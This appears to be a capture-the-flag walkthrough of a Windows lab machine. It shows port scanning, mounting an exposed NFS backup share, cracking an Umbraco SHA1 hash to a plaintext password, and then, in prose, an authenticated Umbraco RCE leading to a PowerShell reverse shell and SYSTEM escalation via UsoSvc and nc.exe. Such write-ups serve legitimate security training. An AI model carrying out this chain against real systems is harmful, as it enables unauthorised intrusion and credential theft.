$ nmap -p- --min-rate 5000 10.129.227.150
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 04:27 EDT
Warning: 10.129.227.150 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.227.150
Host is up (0.035s latency).
Not shown: 65026 closed tcp ports (conn-refused), 494 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
NFS
Network File System was publicly available on port 2049, and this is not a port I see often. This service can have very interesting files and permissions, so let's enumerate it via showmount.
$ showmount -e 10.129.227.150
Export list for 10.129.227.150:
/site_backups (everyone)
We can mount onto this and view the files inside:
$ sudo mount -t nfs 10.129.227.150:/site_backups /mnt/
$ ls -la
total 159
drwx------ 2 nobody 4294967294 4096 Feb 23 2020 .
drwxr-xr-x 19 root root 36864 Apr 22 05:16 ..
drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 2020 bin
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Config
drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Media
drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 2020 Web.config
We can go through each of the folders, and we would find an SDF file for Umbraco within App_Data, which normally contains hashes.
$ ls
cache Logs Models packages TEMP umbraco.config Umbraco.sdf
If we use strings on it, we would find a load of input. At the top, it seems that there are SHA1 hashes present:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2023-05-02 04:34) 1.538g/s 15113Kp/s 15113Kc/s 15113KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
So now we have some credentials at least.
Umbraco RCE
There were hints that Umbraco was used to host the sites, so let's view port 80. It seems to be a blog page:
The login page for the website is located at the /Umbraco directory. We can login with the credentials and email we found earlier.
After logging in, we can enumerate the version that it is running.
This version of Umbraco is vulnerable to an Authenticated RCE exploit:
Take note of the cmd and FileName parameter in the payload variable. In my case I just used Powershell to download and execute a reverse shell script.
Privilege Escalation
PowerUp
We can first enumerate our privileges as the user:
PS C:\windows\tasks> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disable
We see that we have a ton of privileges, and most importantly SeImpersonatePrivilege is enabled. This means that we probably have some cotnrol over services and this could be used for PE. I used PowerUp.ps1 to exploit this system.
We have control over the UsoSvc service. With this, we can run commands as the SYSTEM user. All we need to do is download nc.exe to the machine and run it as the administrator.
